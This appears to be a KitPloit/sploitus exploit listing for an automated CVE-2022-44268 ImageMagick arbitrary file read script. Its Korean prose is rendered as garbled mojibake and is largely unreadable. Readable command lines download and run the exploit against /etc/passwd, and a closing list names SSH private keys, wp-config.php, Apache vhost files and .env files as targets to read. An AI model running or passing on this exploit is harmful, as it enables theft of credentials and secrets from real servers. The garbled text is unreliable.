## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-NAREKKAY-AUTO-CVE-2022-44268.SH
# auto-cve-2022-44268

CVE-2022-44268 ImageMagick ์์ ํ์ผ ์ฝ๊ธฐ ์๋ํ
์๋ณธ ๋ฐ๊ฒฌ: https://www.metabaseq.com/imagemagick-zero-days/
PoC ์ ์ฅ์: https://github.com/duc-nt/CVE-2022-44268-ImageMagick-Arbitrary-File-Read-PoC
# ์ค๋ช
ImageMagick์ "profile" ํ
์คํธ ๋ฌธ์์ด์ **ํ์ผ ์ด๋ฆ** ์ผ๋ก **ํด์** ํ๊ณ , ํด๋น ์ฝํ
์ธ ๋ฅผ ์์ ํ๋กํ๋ก **๋ก๋** ํ ๋ค์, ๊ณต๊ฒฉ์๊ฐ **๋ฆฌ๋ชจํธ ํ์ผ์ ์ฝํ
์ธ ๋ฅผ ํฌํจํ** ํฌ๊ธฐ๊ฐ ์กฐ์ ๋ ์ด๋ฏธ์ง๋ฅผ **๋ค์ด๋ก๋** ํ ์ ์์ต๋๋ค.
## ์ทจ์ฝ์ ๋ฐ ์ต์คํ๋ก์ ์์ฝ
๐ด PNG ํ์ผ์ ๊ฐ์ ธ์ "profile" EXIF ํ๋์ ํ์ผ ๊ฒฝ๋ก๋ฅผ ์ถ๊ฐํ๊ณ , ์ํฅ์ ๋ฐ๋ ImageMagick ๋ฒ์ ์ ์ฌ์ฉํ๋ ์น์ฌ์ดํธ์ ์ ์กํ๋ฉด, ImageMagick์ด ํ์ผ ๊ฒฝ๋ก๋ฅผ ํด์ํ์ฌ EXIF ํ๋์ ํด๋น ์ฝํ
์ธ ๋ฅผ ๋ก๋ํฉ๋๋ค. ์ดํ ์ด๋ฏธ์ง๋ฅผ ๋ค์ด๋ก๋ํ๊ณ "Raw Profile Type" ํ๋์ HEX ๋ฐ์ดํฐ๋ฅผ ์ถ์ถํ ํ ASCII๋ก ๋ณํํ์ฌ ๋ฆฌ๋ชจํธ ํ์ผ์ ์ฝ์ ์ ์์ต๋๋ค.
์ํฅ๋ฐ๋ ๋ฒ์ : ImageMagick 7.1.0-49
# ์๊ตฌ ์ฌํญ
root@kitploit:~
sudo apt install pngcrush imagemagick exiftool exiv2 -y
# ์ฌ์ฉ๋ฒ
root@kitploit:~
wget https://github.com/narekkay/auto-cve-2022-44268.sh/releases/download/auto-cve-2022-44268.sh/auto-cve-2022-44268.sh
wget https://github.com/narekkay/auto-cve-2022-44268.sh/releases/download/auto-cve-2022-44268.sh/flag.png
chmod +x auto-cve-2022-44268.sh
./auto-cve-2022-44268.sh <์ด๋ฏธ์ง ์ด๋ฆ> <์ฝ์ ํ์ผ>
# ์์
root@kitploit:~
./auto-cve-2022-44268.sh flag.png /etc/passwd
# ๋ฐ๋ชจ
https://github.com/narekkay/autoexploit-cve-2022-44268/assets/24856100/cd5719e5-6eae-4544-b4dc-719b1182018d
# ์ด๊ฑฐ ํ
/etc/passwd์์ ์ฌ์ฉ์๋ฅผ ํ๋ณดํ ํ์๋ /home/.ssh// ์์ SSH ๊ฐ์ธ ํค๋ฅผ ์ด๊ฑฐํด ๋ณด์ธ์:
* id_rsa
* id_ecdsa
* id_ed25519 ์: /home/john/.ssh/id_ed25519
๋ค์๋ ์์ง ๋ง์ธ์:
* WordPress์ wp-config.php์ ๊ฐ์ ์๋ ค์ง CMS์ ์ค์ ํ์ผ
* /etc/apache2/sites-available/000-default.conf ๊ฐ์ ๊ฐ์ ํธ์คํธ ์ด๊ฑฐ
* ์ธ์คํด์ค์ .env ํ์ผ
### ํ๊ทธ
imagemagick, exploit, vuln, magick convert, magick resize, exploitation, vulnerabilities, file read, CVE-2022-44268